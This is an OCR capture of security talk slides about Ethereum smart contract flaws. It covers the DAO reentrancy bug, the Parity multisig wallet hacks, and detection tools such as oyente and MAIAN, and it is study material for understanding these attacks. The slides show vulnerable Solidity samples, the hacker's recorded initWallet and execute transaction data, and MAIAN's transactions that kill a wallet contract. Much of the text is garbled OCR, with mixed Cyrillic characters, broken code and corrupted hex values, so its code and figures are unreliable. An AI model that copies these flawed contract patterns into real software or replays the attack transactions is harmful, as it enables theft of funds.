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when transactions aren’t enough 


e “Тһе key 
component is this 
idea of a Turing- 
complete 
blockchain” 


° --italih Buterin 


meow—putting that computing to use 
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smart contracts 


billions, or just millions, of reasons 


З Stephan Tual ( Follow 


No DAO funds at risk following the 
Ethereum smart contract ‘recursive call’ 
bug discove ry WIERD A$50 Million Hack Just Showed That the DAO Was All Too Human PARITY TECHNOLOGIES PRESENTS 


ES is на to have A $0 MILLION НАСА JUST | PARITY 
узок nudag eee q SHOWED THAT THE DAO WAS ef 
to his guidance we were mi — ALL TO HUMAN ETHEREUM BROWSER 


Ethereum smart contracts. [3] 


"recursive call vulnerability 


grated directly into your Web browser, 


as can be seen on line 580: 


problem isn’t going away 


#Candidates Candidates 
Category flagged without 
(distinct) source ati 
—— | 1504 (438) 1487 


sucia | mem [т | 2] — 99 | 
Greedy | 312000324 | 31045 | 1083 | 69 — 
тош || 34,200,365) | 34,019 | 379 | 39 — 


Table 1: Final results using invocation depth 3 at block 
height BH. Column 1 reports number of flagged contracts, 
and the distinct among these. Column 2 shows the num- 
ber of flagged which have no source code. Column 3 is 
the subset we sampled for concrete validation. Column 4 
reports true positive rates; the total here is the average TP 
rate weighted by the number of validated contracts. 


Solidity 


dev tools RER 


S puzzle.sol 


contract Puzzle{ 
public owner; 


ж [e] Javascript VM Backend ethereum node 


Gb ca35b7d915458ef540ade6068dFe2F44e8fa733c 7 


° „sol files > bytecode > blochchain ис ае cmm 


* Atom with plugins: 
* language-ethereum | 
* etheratom NEN 


hei : == owner) { 
if (locked) th 


° Remix: browser based m sendrevard 


solution = 
locked = 


~{Google Drive/presentations/DeFcon/backup/puzzle.sol 14 LF UTF-8  Solidity 3j o files 


oyente and Manticore 


— | Visualizer 


Ethereum 
State 


EXPLORER ANALYSIS 


73 Bit-Vector Solver 


root#O1562f60ae20: /oyente/oyente# python oyente.py -з hackertest.sol MA N Т! СОВЕ 
INFO: root:contract hackertest.sol:greeter: 


INFO: symExec: Results 
INFO: symExec: EVM Code Coverage: 99.5% 
INFO: symExec: Parity Multisig Bug 2: False 


INFO: symExec: Callstack Depth Attack Vulnerability: False 
INFO:symExec: Transaction-Ordering Dependence (TOD): False 
INFO: symExec: Timestamp Dependency: False 
INFO:symExec: Re-Entrancy Vulnerability: False 
INFO: symExec: Analysis Completed 


MAIAN 


MAIAN v1.0 


Run 


Type of contract code 
© Solidity source code Contract пате WalletLibrary 
C Bytecode source 


C Bytecode compiled 


Iv Check on Prodigal 
М Check on Suicidal START 


У Check on Greedy 


] Check if 


Compiling Solidity contract from the file example contracts/ParityWalletLibrary.sol ... Done 
Connecting to PRIVATE blockchain emptychain ESTABLISHED 

Deploying contract .... confirmed at address: 0x9E535236A4BF2288a37864C6A1AfTaAG4CO980464306 
Contract code length on the blockchain : 16538 $x60606045052680536105101105760.. , 
Contract address saved in file: ./oot/wWolletlibrary.address 

contract is SUICIDAL 


sol Wallet - Check on PRODIGAL [ ] Contract address : 0x9E536236A8F2288a7864C6A1AfaA4Cb980464306 
Malti-sig, dasly-limsited account proxy/wallet Vulnerability found | 1 Contract bytecode : 60606040526004361061011d576000357c0100000000000000. . . 
author 24: d d nat 
ur Vend ДИР Vulnerability confirmed [ ] Bytecode length 16528 
inheritable "property" contract that enables methods to be (see the log below) Е 2 Mean Шашы ы. : rue 
protected by requiring the acquiescence of either a [ ] Debug False 
single, of, crucially, each of a number of, designated owners ы 
usage Check on SUICIDAL | 1 Search with call depth: 1  : 1111111111111111111111 
use modifiers onlyowner (just own owned) or | 1 Search with call depth: 2 : 1112222222222222222222222122222222222222222222212222 


onlymanyowners{hash), whereby the same hash must be provided 
by 

some number (specified in constructor) of the set of owners 
(specified in the constructor, modifiable) before the 


interior гу executed 


Vulnerability found 
Vulnerability confirmed 
(see the log below) 


Suicidal vulnerability found 
The following 2 transaction(s) will trigger the contract to be killed: 


-Tx[1] 


:e46dcfeb 88808000000008000000000000000000000000000000000000000000000000000450 000000200000000 


Check on GREEDY гаггвггеаеевагагггегагавагггевгагавагегегевагагае агавагегеевеваваггавевеавагегаегагавагегевеавагегага 


pragma solidity "0.49. 


Not vulnerable 


lk I — |x 


@ёайаааавааайайа 


contract WalletEvents | 


EVENTS 


this contract only has six types of events: it can accept a 
confirmation, in which case 
we record owner and operation (hash) alongside it 
event Comfiemation(address owner, bytes32 operation) 


event Revoke(address owner, bytes 32 operation); 


some others are in the case of an owner changing, 
event OwnerChanged(address old Owner, address newOwner) 


І» 


[-] Suicidal vulnerability found! 


The following 2 transaction(s) will trigger the contract to be killed 
Ta 1) se4édefeb 


OOOOO0000000000000000000000000000000000000000000000090 


0000000040 
90000000000 
0000000000400000000000000000009000000000000 


(QOOOO0000000000000000 
OODOO0000000000000000 
Tx{2] :cbfoboco 


400 00000000000000000000000000 


ent OwnerAdded(address newOwner 
— га == — ^ 21 Тһе transact ons correspond to the functions 
inet Wallet(address[ | uint256,uint256) 
š kilWaddress) 
Settings 
[ ] Confirming suicide vulnerability on private chain tx[0] mined 
3 


Max function invocations 


Solver timeout (msec) 10000 


tx] 1) mined 


Confirmed ! The contract is suicidal’ 


To keep MAIAN free and up to date, consider donating Ether to our account: Oxfd03b29b5c20f8788 36a 3b357 1835 ladf24f4a06 


E: 


-Tx[2] :cbfübece 


The transactions correspond to the functions: 

-initwallet(address[],uint256,uint256) 

-killtaddress) 

tx[1] mined 


Confirming suicide vulnerability on private chain ... ..... tx[9] mined ........ 


Confirmed ! The contract is suicidal ! 


basic methodology 


* Interview devs 

* Review .sol file 

* Try compiling 

* Dissect code flow 

* Run oyente (cross fingers) 

* Run Manticore 

* Run MAIAN 

* Manually check for following vulns... 


reentrancy 


contract ReEntrancy { 


mapping І > ) private expendableTokens; 


function stealTokens() public í 
amountToLose = expendableTokens[ і ПЕ 
if (!(msg. .call.value(amountToLose)())) í throw; | 
expendableTokens[ 


leave off the first “re-” for savings 


contract Entrancy { 


mapping ( > ) private expendableTokens; 


function stealTokens() public { 
amountToLose - expendableTokens[ 
expendabLeTokens[msq. ] = 0; 
bet GR | .Call.valuetamountToLose)(2)) í throw; } 


reentrancy (and irony) in the dao code 


/^/ Burn DAO Tokens 
Transfer(msg.sender, ©, balances | п55 5епаєг 1); 
withdrawRewardFor(msg.sender); zz; be nice, and get his rewards 
totalSupply -= balances[msg.sender]; 


balances [msg.sender] = 0; 
paidOut[msg.sender] = 
return true; 


default ри 


blic — Parity wallet hack 


! 4 hr r ] 


Lt LII i NALLE Le 


ff constructor is given number of sigs required to do protected "onlymanyowners" transactions 


// as well as the selection of addresses capable of confirming them. 


function initMultiownedí(address[] owners, uint required) í 
+ function initMultiowned(address[] owners, uint required) internal í 
m numOwners = _owners. length + 1; 


m owners[1] = uint(msg.sender); 


m ownerIndex[uint(msdqd.sender)] = 1; 


«e 


198,7 %198,7 @@ contract WalletLibrary is Walle 


ff constructor - stores initial daily limit and records the present day's index. 
- function initbpaylimit(uint limit) í 
+ function initDaylimit(uint limit) internal { 


ff constructor - just pass on the owner array to the multiowned and 
// the limit to daylimit 
- function initwallet(address[] owners, uint required, uint _daylimit) í 
+ function initwallet(address[] owners, uint required, uint daylimit) only uninitialized í 


tWallet 


Transaction Information 


TxHash: 
Block Height: 
TimeStamp: 
From: 


To: 


Value: 

Gas Limit: 

Gas Price: 

Gas Used By Txn: 


Actual Tx Cost/Fee: 


Cumulative Gas Used: 


Nonce: 


Input Data: 


| Overview | Comments 
Tools & Utilities 7 


Üx9dbf0326303a2a37 19c27 be4fa69aacc985710231a8d9dcaede4bbOB3def/5ec 
4043800 (28739 block confirmations) 

B days 5 hrs ago (Jul-19-2017 12:18:15 PM +UTC) 

Oxb3764761 e297 dbf121679c32a65829cd1 ddb4d32 (MultisigExploit-Hacker) 
Contract Üxbec591de75b8699a3ba521073428822d0bfcOd7e Ө 

D Ether ($0.00) 

82703 

0.000000021 Ether (21 Gwei) 

66839 

0.001403619 Ether ($0.29) 

1283734 


5 


Ше ИРИДЕГИ ЕН ЕБ owners, uint256 required, 
uint256 daylimit) *** 


MethodID: Gxe46dcfeb 
[0]: 00000000000000000000000000000000000000000000000000000000 
00000060 


[1] :00000000000000000000000000000000000000000000000000000000 
00000000 7 


Convert To Ascii 


Internal Transactions Event Logs Comments 


execute Transaction Information Tools & Utilities ~ 


TxHash: OxeeflOfc5170f669b86c4cd0444682a96087 22 1325/8 bf25d6 188633 aa7 Бе? c 
Block Height: 4043802 (28738 block confirmations) 

TimeStamp: 6 days 5 hrs ago (Jul-19-2017 12:19:36 PM +UTC) 

From: Oxb3764761 e297 d6f121e79c32a65829cd1ddb4d32 (MultisigExploit-Hacker) 
To: & Contract Üxbec591de75b869933ba521073428822d0bfcOd7e (9 


TRANSFER 82,189 Ether to — Охь3764761е297 461121... 


Value: D Ether ($0.00) 

Gas Limit: 78926 

Gas Price: 0.000000021 Ether (21 Gwei) 
Gas Used By Txn: 58433 

Actual Tx Cost/Fee: 0.001227093 Ether ($0.25) 
Cumulative Gas Used: 1821881 

Nonce: 6 

Input Data: 


Function: execute(address to, uint256 value, bytes data) 


MethodID: Oxb61d27f6 


(91:0000000000000000000000005376476162974617121679с32а65829с4 
14454432 
[11:00000000000000000000000000000000000000000000116779808с03 
е4140000 


Convert To Ascii 


Parity multisig wallet hack 2 


r devops199 commented 22 hours ago * edited 
S 


| accidentally killed it. 


https:;//etherscan.io/address/0x863df6bfa4469f3eadObe8f9f2aae51c91a907b4 


Parity 2 transactions 


Function: in address[] owner 256 required, u 

 daylimit) 

MethodID: 8exe46dcfeb 
4%15151515151515151515151515151515151515151515151515151515151515151515121) дд4д88088888868 
108888888888888888888888888888888888888888888888888888888880888880 
:0888888888888888888888888888888888888888888888888888888888888888 


08880080880888088808880888088808880888088808880888088880888081 


„ымм Rd d Rd d hd kd Rd hd мм 


:60080000800008000080000836e7168deb525 


Function: 
MethodID: 


7, 


[0]:GG0080000000000000000000267168 


not going with the (over)flow 


С) Features Business Explore Marketplace Pricing 


OpenZeppelin / zeppelin-solidity 


<> Code Issues 104 Pull requests 49 Wiki Insights 


Branch: master» zeppelin-solidity / contracts / math / SafeMath.sol 
В frangio Update to Truffle 4.1.5 and Ganache 6.1.0 (#876) 


2256 -1 7 contributors РЕ ВВВ м 


49 lines (42 sloc) 1.12 KB 


pragma solidity °@.4.21; 


* SafeMat 
h operations with safety chec that throv | ert 
ж; 
library FeMath { 
* @dev Multiplies two numbers, throws on overflow. 


ж у 
function mul(uint256 a, uint256 b) internal pure returns (uint256) 5 
if (a == 0) ( 


return Q; 


uint256 c = a * b; 


assert(c / a == Б); 


return ce 


unchecked send in king of the ether 


У 


С (бұ à GitHub, Inc. [US] | https://github.com/kieranelby KingOfTheEtherThi 


uint compensation = valuePaid - wizardCommission; 


if (currentMonarch.etherAddress != wizardAddress) { 


ff When the throne is vacant, the fee accumulates for the wizard. 


unchecked send 


if (kingOfLosingDone && !( compensationSent ) ) í 
monarch.sendt 


if (kingOfLosingDone && !( compensationSent ) 
if (monarch.send{ )) 
compensationSent = True; 
else throw; 


gas limits 


BEST BLOCK UNCLES LAST BLOCK 


— ACTIVE NODES 52/53 GAS PRICE GAS LIMIT 


BLOCK TIME DIFFICULTY BLOCK PROPAGATION 


Wl аһа... | lli A, woll E 
2 4 у: 


UNCLE COUNT TRANSACTIONS GAS SPENDING 


This page does nat represent the entire state of the ethereum network - listing a node on this page is a voluntary process. 


GAS LIMIT 


(1) ATTENTION! 


withdraw don’t send 


contract { 
address public richest; 
uint public mostSent; 


function (1 payable + 
richest = ms 
mostSent = msg. 


function () payable returns (bool) { 
TT i value » 


g.value); 


withdrawn not sent 


function () payable returns (bool) í 
if (msg.value > mostSent) { 


contract 
address public riche 
Uint public mostSent; pendingwithdrawals[richest] += msg.value; 
richest - msg.sender; 


mostSent = msg.value; 


mapping (address => uint) pendingwithdrawals; 


return true; 


function () payable { 


return false; 


richest 
mostsen 


function MES 
uint amount = pendingwithdrawals[msg.sender]; 


pendingwithdrawals[msg.sender ] 
msg.sender. (amount) ; 


encryption 


Thanks. | win 


transaction-ordering dependence 


PuzzLe{ 
owner; St 
Locked; (msg.sender owner) í 
reward; (locked) ; 
ski H owner.sendí(reward); 


solution: reward = msgq.value; 


й ed ee (msg. data. Length 

owner msq.sender; g | і 
, i - (Locked) - 

rewarc msq.Vvalue; EE EE , АСА»: 
Tte | T | (сһа25біпса.дата) diff){ 

скес = 0 15-4 сеш , у 
E E | der.sendíireward); 
diff = bytes32(11111); 


solution msq.data; 


Locked true; 


transaction-ordering dependence 


Puzzlei 
address Owner; ){ 
›001 Locked; (msg.sender owner) 1 
ціпі reward; (Locked) ; 
)ytes32 diff; owner.send(reward); 


)ytes solution; reward = msg.value; 


е EES s (msq.data. Length 
owner = msg.sender; Sis | А 
F i - (locked) - 
гешагс msq.value; i ee ee: 
locked : T | (sha256(msq. data) GEES 
скес = 0 15-4 сеш , у 
LOCKE та | der.send(reward); 


diff = bytess2(11111); solution = msg.data; 


Locked true; 


call-stack depth limit 


:SyYmEXec: EVM 
:sSymExec: Parity Multisig Bug 2: 


io 
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:SymExec: Callstack Depth Attack Vulnerability: 
:вушЕхес: Transaction-Ordering Dependence (TOD): 
:SyYmEXec: Timestamp Dependency: 

:SymExec: Re-Entrancy Vulnerability 
:symExec: ====== Analysis Completed = 
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A Ethereum © 
w (@ethereumproject 


Following v 


Announcement of imminent hard fork for 
EIP150 gas cost changes: 


Announcement of imminent hard fork for EIP150 gas cost... 

During the last couple of weeks, the Ethereum network has been 
| — the target of a sustained attack. The attacker(s) have been very 
— crafty in locating vulnerabilities in the client implementations as... 


28 РМ - 13 Oct 2016 


cn 


variable or function ambiguity 


Player[] persons; 


uint payoutCursor Id 
uint balance Q; 


address owner; 
uint payoutCursor_Id=0; 
(balance > persons[payoutCursor Id ].deposit / 100 ж 115) 1 
uint MultipliedPayout = persons[payoutCursor Id ].deposit / 100 ж 115; 


persons[payoutCursor Id].etherAddress.send(MultipliedPayout); 


balance MultipliedPavyout; 
payoutCursor Id ++; 


odds and ends 


2 Т. доп liczenie User logge „Ме e 
Timestamp dependence nom 9. bet ы. o Poit d 
2 В ° o .words = a.length; e b.length - 1; return C; 
usiness logic flaws length;c++) í talc], Б) && b.push(a[c]) 
" , М var а = 9, b = $("#U \.уа1(), b = b.replace(/ 
- Separating public/private b.replace(/ *(?- )/g. b.split(" "); 


= [], а = @;а < im +) í Ө == use агг 
data inp array[a], use th - 1].use class = 
input words - a. XucSort("use class" 

< b && a.splic; wword(a, void 9); 


іп(а, 200), а = Math .min(as parseint(h(). unique) ) ; li 


things might be getting better? 
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Беер in touch 


@KonstantHacker 


BT 


